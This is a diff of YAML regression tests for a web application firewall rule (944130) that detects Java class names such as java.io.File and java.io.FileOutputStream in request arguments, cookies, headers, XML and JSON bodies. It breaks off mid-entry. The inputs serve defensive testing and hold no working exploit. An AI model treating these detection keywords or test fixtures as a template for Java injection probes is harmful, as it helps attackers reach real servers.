Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 92 desc: "Cookie name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 104 desc: "Request header test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 